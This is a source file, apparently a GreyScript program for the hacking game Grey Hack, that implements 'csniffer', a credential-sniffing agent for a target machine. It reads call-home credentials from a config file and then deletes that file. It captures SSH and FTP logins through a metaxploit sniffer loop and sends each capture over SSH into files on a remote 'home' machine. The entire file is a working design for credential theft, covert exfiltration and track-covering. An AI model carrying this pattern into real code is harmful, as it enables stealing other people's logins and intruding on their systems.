// ============================================================
// CORVID | csniffer
// Standalone credential sniffer agent.
// Runs on a target machine. Captures SSH/FTP credentials
// of clients connecting to this machine, then SSHes to
// the call-home machine to write captures.
//
// Config file: /shiny/csniffer-config.txt
// Format (one per line):
//   home_ip=x.x.x.x
//   home_port=22
//   home_user=root
//   home_pass=password
//   home_path=/shiny/sniffer
//   limit=0
// ============================================================

// ── Load config ───────────────────────────────────────────────
comp = get_shell.host_computer
cfgFile = comp.File("/shiny/csniffer-config.txt")
if cfgFile == null then
    exit("csniffer: config not found")
end if
cfgRaw = cfgFile.get_content
if cfgRaw == null or cfgRaw.len == 0 then
    exit("csniffer: config empty")
end if

homeIp   = ""
homePort = 22
homeUser = "root"
homePass = ""
homePath = "/shiny/sniffer"
limit    = 0

for line in cfgRaw.split(char(10))
    line = line.trim
    if line.len == 0 then
        continue
    end if
    eqIdx = line.indexOf("=")
    if eqIdx == null then
        continue
    end if
    key = line[:eqIdx].trim
    val = line[eqIdx + 1:].trim
    if key == "home_ip" then
        homeIp = val
    end if
    if key == "home_port" then
        homePort = val.val
    end if
    if key == "home_user" then
        homeUser = val
    end if
    if key == "home_pass" then
        homePass = val
    end if
    if key == "home_path" then
        homePath = val
    end if
    if key == "limit" then
        limit = val.val
    end if
end for

if homeIp.len == 0 then
    exit("csniffer: no home_ip in config")
end if
if homePass.len == 0 then
    exit("csniffer: no home_pass in config")
end if

// ── Delete config file after reading ─────────────────────────
cfgFile.delete()

// ── Load metaxploit ───────────────────────────────────────────
meta = include_lib("/lib/metaxploit.so")
if meta == null then
    meta = include_lib("/shiny/metaxploit.so")
end if
if meta == null then
    exit("csniffer: metaxploit not available")
end if

// ── Helper: call home and write capture ───────────────────────
callHome = function(captureData)
    // Connect to call-home machine via SSH from target
    myShell = get_shell
    homeShell = myShell.connect_service(homeIp, homePort, homeUser, homePass, "ssh")
    if typeof(homeShell) != "shell" then
        return false
    end if
    homeComp = homeShell.host_computer
    // Ensure capture directory exists
    dirF = homeComp.File(homePath)
    if dirF == null then
        pathParts = homePath.split("/")
        parentPath = ""
        for part in pathParts
            if part.len == 0 then
                continue
            end if
            parentPath = parentPath + "/" + part
            existing = homeComp.File(parentPath)
            if existing == null then
                parentDir = parentPath[:parentPath.lastIndexOf("/")]
                dirName   = part
                if parentDir.len == 0 then
                    parentDir = "/"
                end if
                homeComp.create_folder(parentDir, dirName)
            end if
        end for
    end if
    // Write capture file with timestamp-based name
    capName = "sniff_" + str(floor(time)) + ".txt"
    homeComp.touch(homePath, capName)
    capFile = homeComp.File(homePath + "/" + capName)
    if capFile == null then
        return false
    end if
    capFile.set_content(captureData)
    return true
end function

// ── Capture loop ──────────────────────────────────────────────
captured = 0
while true
    capture = meta.sniffer(0)
    if capture == null then
        continue
    end if
    if typeof(capture) != "string" then
        continue
    end if
    if capture.len == 0 then
        continue
    end if

    callHome(capture)
    captured = captured + 1

    if limit > 0 and captured >= limit then
        break
    end if
end while
